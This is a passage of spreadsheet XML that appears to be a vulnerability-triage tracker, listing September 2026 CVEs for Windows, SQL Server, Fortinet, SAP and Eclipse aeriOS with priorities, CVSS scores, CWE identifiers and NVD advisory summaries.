    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1022" r:id="rId1021"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1023" r:id="rId1022"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1024" r:id="rId1023"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1025" r:id="rId1024"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1026" r:id="rId1025"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1027" r:id="rId1026"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1028" r:id="rId1027"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1029" r:id="rId1028"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1030" r:id="rId1029"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1031" r:id="rId1030"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1032" r:id="rId1031"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1033" r:id="rId1032"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1034" r:id="rId1033"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1035" r:id="rId1034"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1036" r:id="rId1035"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1037" r:id="rId1036"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1038" r:id="rId1037"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1039" r:id="rId1038"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1040" r:id="rId1039"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1041" r:id="rId1040"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1042" r:id="rId1041"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1043" r:id="rId1042"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1044" r:id="rId1043"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1045" r:id="rId1044"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1046" r:id="rId1045"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1047" r:id="rId1046"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1048" r:id="rId1047"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1049" r:id="rId1048"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1050" r:id="rId1049"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1051" r:id="rId1050"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1052" r:id="rId1051"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1053" r:id="rId1052"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1054" r:id="rId1053"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1055" r:id="rId1054"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1056" r:id="rId1055"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1057" r:id="rId1056"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1058" r:id="rId1057"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1059" r:id="rId1058"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1060" r:id="rId1059"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1061" r:id="rId1060"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1062" r:id="rId1061"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1063" r:id="rId1062"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1064" r:id="rId1063"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1065" r:id="rId1064"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1066" r:id="rId1065"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1067" r:id="rId1066"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1068" r:id="rId1067"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1069" r:id="rId1068"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1070" r:id="rId1069"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1071" r:id="rId1070"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1072" r:id="rId1071"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1073" r:id="rId1072"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1074" r:id="rId1073"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1075" r:id="rId1074"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1076" r:id="rId1075"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1077" r:id="rId1076"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1078" r:id="rId1077"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1079" r:id="rId1078"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1080" r:id="rId1079"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1081" r:id="rId1080"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1082" r:id="rId108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0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CVE-2026-81963</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-59</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81963</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85880</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-908</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85880</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26084</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>A improper access control vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox Cloud 5.0.4 through 5.0.5, FortiSandbox PaaS 5.0.4 through 5.0.5 may allow attacker to access sensitive information via crafted HTTP requests.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26084</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86464</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>kubernetes, docker, postgresql, keycloak</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-1392, CWE-200, CWE-306, CWE-798</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>In the current development version of Eclipse aeriOS, for which no official release has yet been published, the Identity Manager (IdM) deployment included insecure default configurations and credentials for security-sensitive services.
The Helm chart exposed the Keycloak service and its PostgreSQL backing database through Kubernetes NodePort services by default, while the Docker Compose deployment similarly exposed PostgreSQL on all network interfaces. The deployment included fixed default credentials for the Keycloak administrator and PostgreSQL database user, and the previous Helm chart configuration did not provide adequate secret management for these credentials. In addition, predefined application users with known credentials were provided for development and testing without sufficiently warning operators against their use in production environments.
An attacker able to reach the exposed services could use the published default credentials to obtain administrative access to the Identity Manager or direct access to its database. This could allow unauthorized access to or modification of identity-management data, including users, roles, client credentials, sessions, and cryptographic material, and could enable the creation of privileged identities or tokens accepted by other aeriOS components.
The issue has been addressed by generating a random Keycloak administrator password by default, managing Keycloak and PostgreSQL credentials through Kubernetes Secrets, and restricting PostgreSQL to an internal service in both the Helm chart and Docker Compose deployment. OpenLDAP is also restricted to an internal service. The predefined users intended for development and testing are retained, but the documentation now explicitly warns that their default credentials must not be used in production and that these users should be removed or their credentials changed after installation.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86464</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58240</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-308</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>SAP NetWeaver Message Server does not sufficiently validate the authenticity of internal application server components during registration. An unauthenticated attacker with network access to the affected service could exploit this weakness to register an unauthorized component and potentially perform unauthorized actions within the application environment, resulting in a high impact on the confidentiality, integrity, and availability of the affected system.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58240</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67631</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67631</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67643</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67643</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68839</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Mass Storage Class Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68839</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69463</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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 s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69463</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69525</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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 s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69525</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69829</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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 s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Shell allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69829</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69845</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
